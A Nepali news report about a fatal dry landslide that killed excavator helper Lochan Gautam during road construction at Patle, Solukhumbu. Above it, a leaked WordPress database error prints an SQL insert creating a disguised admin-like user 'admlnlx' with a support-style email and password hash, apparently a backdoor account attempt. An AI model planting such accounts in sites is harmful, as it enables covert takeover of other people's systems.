WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bi6qsFnvwhq/7V5Ee0FSDE.NecSE/y0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 16:29:42', '', 'admlnlx', 'admlnlx')
महाकुलुङ गाउँपालिकामा सुख्खा पहिरोमा परी एक जनाको ज्यान गएको छ । महाकुलुङ गाउँपालिका १ पात्लेमा सडक खन्न प्रयोग गरिएको स्काभेटरका सहयोगी लोचन गौतमको पहिरोमा परी मृत्यु भएको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जानकारी दिए ।
पात्ले भिरमा सडक खन्ने क्रममा दिउँसो एक्कासी पहिरो खसेको थियो । चालक खाना खान गएको समयमा पहिरो खसेको बताइएको छ । पहिरो खस्ने बेला सहयोगी गौतम स्काभेटरमा नै थिए । गौतम नेचा सल्यान गाउँपालिका ३ का हुन् ।
महाकुलुङ क्षेत्रमा सडक खन्न प्रयोग गरेको स्काभेट भने स्थानीय दुर्गा राईको स्वामित्वमा रहेको बताइएको छ ।